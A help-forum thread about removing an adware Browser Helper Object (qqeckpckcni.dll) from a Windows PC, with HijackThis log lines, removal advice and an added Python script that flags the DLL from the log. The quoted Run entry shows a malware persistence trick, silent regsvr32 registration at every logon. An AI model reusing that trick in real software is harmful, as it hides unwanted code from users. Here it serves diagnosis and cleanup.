Furthermore you seem not to have an active software firewall running on that machine, so you expose yourself to additional risks,

polonus
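Added example, not HijackThis code and not something posted in the thread: a Python triage of the O2/O4 lines that matches each BHO DLL against Run entries handing it to regsvr32 /s at every logon, which is the pairing polonus points to. The log excerpt is constructed from entries quoted above; the "looks random" name test is this example's own heuristic, not an HJT rule.

```python
import re

# Constructed excerpt of the HijackThis log posted above (O2 and O4 lines only).
HJT_LOG = r"""
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O2 - BHO: Search Helper - {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SearchHelper.dll
O2 - BHO: cpmsky browser enhancer - {B3E68FB2-BFC4-6990-21C4-2C2D28DF79CE} - C:\Windows\system32\qqeckpckcni.dll
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\Run: [xbthkmizjbfdfj] C:\Windows\System32\regsvr32.exe /s "C:\Windows\system32\qqeckpckcni.dll"
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
"""

O2_RE = re.compile(r"^O2 - BHO: (?P<name>.*?) - \{(?P<clsid>[^}]+)\} - (?P<path>.*)$")
O4_RE = re.compile(r"^O4 - (?P<hive>.+?)\\\.\.\\Run: \[(?P<key>[^\]]*)\] (?P<cmd>.*)$")
# A Run command that hands a DLL to regsvr32, optionally with the silent /s switch.
REGSVR_RE = re.compile(r'\bregsvr32(?:\.exe)?\s+(?P<silent>/s\s+)?"?(?P<dll>[^",]+?\.dll)"?', re.I)


def looks_random(name):
    """Heuristic assumed by this example (not an HJT rule): a name of ten or more
    characters containing a run of five or more consonants, e.g. qqeckpckcni."""
    return len(name) >= 10 and re.search(r"[b-df-hj-np-tv-xz]{5,}", name.lower()) is not None


def parse_log(text):
    """Split an HJT log into its O2 (BHO) and O4 (Run) entries as dicts."""
    bhos, runs = [], []
    for line in text.splitlines():
        if m := O2_RE.match(line):
            bhos.append(m.groupdict())
        elif m := O4_RE.match(line):
            runs.append(m.groupdict())
    return bhos, runs


def triage(text):
    """Map each suspicious BHO DLL path to the reasons it was flagged: a Run entry
    re-registers it with regsvr32 at every logon, and/or its names look random."""
    bhos, runs = parse_log(text)
    registrars = {}  # lower-cased dll path -> Run entry that regsvr32's it
    for r in runs:
        if m := REGSVR_RE.search(r["cmd"]):
            registrars[m["dll"].lower()] = {"key": r["key"], "silent": bool(m["silent"])}
    flagged = {}
    for b in bhos:
        path = b["path"]
        if not path.lower().endswith(".dll"):
            continue  # '(no file)' leftovers load nothing
        reasons = []
        if hit := registrars.get(path.lower()):
            how = "silently " if hit["silent"] else ""
            reasons.append(f"{how}re-registered at every logon by O4 [{hit['key']}]")
            if looks_random(hit["key"]):
                reasons.append(f"Run key name {hit['key']!r} looks random")
        stem = path.rsplit("\\", 1)[-1][:-4]
        if looks_random(stem):
            reasons.append(f"file name {stem!r} looks random")
        if reasons:
            flagged[path] = reasons
    return flagged
```

On the excerpt only qqeckpckcni.dll comes back, with all three reasons; the Adobe and Microsoft BHOs and the rundll32 entry for NvCpl.dll are left alone.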

O4 - HKLM\..\Run: [xbthkmizjbfdfj] C:\Windows\System32\regsvr32.exe /s "C:\Windows\system32\qqeckpckcni.dll" Nasty

Ran the virus total on this file and it received a 0/40 for it being a virus.

Hi turtlegk33,

But this cpmsky browser enhancer is adware malware for IE (not for Firefox, apparently), but you have to uninstall that with HJT in Safe Mode. It is a trojan, no matter what virustotal says; this might be one of their new dll’s: qqeckpckcni.dll. Get rid of it, it is a Browser Helper Object you do NOT need in Internet Explorer, it is notorious adware!
Also read the information where someone is helped to get rid of this crap:
http://www.bleepingcomputer.com/forums/lofiversion/index.php/t212644.html

polonus

O2 - BHO: cpmsky browser enhancer - {B3E68FB2-BFC4-6990-21C4-2C2D28DF79CE} - C:\Windows\system32\qqeckpckcni.dll

Was not needed to be done in safe mode…

O4 - HKLM\..\Run: [xbthkmizjbfdfj] C:\Windows\System32\regsvr32.exe /s "C:\Windows\system32\qqeckpckcni.dll"

on the other hand was needed to be done in safe mode.

qqeckpckcni.dll

Is still in my system32. Does this have anything to do with the pop-ups or with any other viruses that may be on my computer? If so, can I just delete it, or what should I do?

Hi turtlegk33.

First try this on it: http://www.xp-tools.com/winutilities/download.htm
BHOs (Browser Helper Objects) are software that put a toolbar on Internet Explorer or otherwise integrate other software into it. Many (Acrobat Reader, Google Toolbar) are desirable. However, spyware companies also install BHOs on your computer. These can be difficult to remove. BHO Remover lists the BHOs that are currently installed. You can then remove those you don’t want to keep.

If that does not do the trick then get this anti-spyware scanner and do a full scan with it and post the scan report next, download from here:
http://www.malwarebytes.org/mbam-download.php

And if not fully sufficient try this:
http://www.mlin.net/files/StartupCPL_EXE.zip
Download Startup_CPL.exe from Mike Lin’s web site. This program will list multiple startup locations that launch programs when Windows is booted. If you see anything suspicious, disable it from launching in your startup. If you are unsure of whether or not a program entry is safe to disable, you can ask us here.

Else we have other things up our sleeves to get this critter off of your machine,
Also check whether you have C:\WINDOWS\system32\avtap.dll and then delete that as well.

Download OTMoveIt from here:
http://oldtimer.geekstogo.com/OTMoveIt3.exe
Enter this under “Paste instructions for items to be moved”:

O4 - HKLM\..\Run: [xbthkmizjbfdfj] C:\Windows\System32\regsvr32.exe /s "C:\Windows\system32\qqeckpckcni.dll"
and click on the red MoveIt.

polonus